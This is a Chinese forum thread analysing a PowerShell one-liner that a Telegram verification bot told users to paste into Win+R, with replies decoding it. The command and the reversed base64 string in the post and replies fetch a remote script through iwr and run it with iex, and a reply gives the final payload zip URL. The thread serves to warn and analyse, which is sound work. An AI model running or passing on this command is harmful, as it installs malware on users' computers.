Window 网络代码分析 | 请不要轻易在自己电脑尝试

2 天前
 andyiac

有没有 window 高手帮忙看下这个代码干了啥

powershell -c $r='0hHducWaatGe6ZTOvw0doZ1Lt92YuYDN3Fjcy0Gb5Ujax8yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');&($u|%{&('iwr') ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($_)))|&('iex')}); 

昨天一个 Telegram 群要验证是否是真人,提供了上面代码,让用户复制粘贴 Win+R 运行,问了下 chatgpt 提示说是执行了一段网络代码,具体是干什么不熟悉 Window 编程没能搞出来。

有没有 Window 高手帮忙看下这代码到底是干啥了,是否有危险操作。

不清楚风险请不要轻易在自己电脑尝试

不清楚风险请不要轻易在自己电脑尝试

不清楚风险请不要轻易在自己电脑尝试

1753 次点击
所在节点    Windows
13 条回复
ysc3839
2 天前
没必要看,肯定有危险操作
baysonfox
2 天前
"它将变量 $r 中的字符串逆序后再用 Base64 解码,然后通过 iwr 下载并用 iex 执行下载到的远程脚本,属于可疑或恶意行为。" ——ChatGPT

100%在干坏事
baysonfox
2 天前
antik24601
2 天前
想都不用想肯定有问题,正常验证哪有这样的,字符串反转之后 base64 解码就是 payload 的 url ,看起来像是挖矿的
Greendays
2 天前
0hHducWaatGe6ZTOvw0doZ1Lt92YuYDN3Fjcy0Gb5Ujax8yL6MHc0RHa
这串代码,反过来并用 base64 解码,得到一个脚本的地址:


这是用 Deepseek 分析出来的
Greendays
2 天前
@Greendays

按照 AI 的思路来(这个 AI 反转字符串搞错了),这段代码反转后是:

aHR0cHM6Ly8xajU5bG0ycjF3NDYuY29tL1Zod0wvOTZ6eGtaaWcudHh0

能匹配的最长的 Base64 编码是:

aHR0cHM6Ly8xajU5bG0ycjF3NDYuY29tL1Zod0wvOTZ6eGtaaWcudH==

解码出来后确实是一个看上去像是人机验证地址的网页:

crab
2 天前
最终下载 https=x=easypath.cyou/92374ybvt/y79v54822954.zip 执行。
andyiac
2 天前
@crab 在电脑里找到这个文件的加压目录了 :(

noobjalen
2 天前
noobjalen
2 天前
最后运行 ISDbg.exe
serical
2 天前
andyiac
1 天前
确实是 Telegram 上的 Safeguard 中招的,第一次是让点图片验证,然后验证不通过,再验证就换成这个了

https://imgur.com/IOQUdtW.png

https://imgur.com/SpdSCN9.png
twig
1 天前
目测郭宇

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://tanronggui.xyz/t/1107559

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX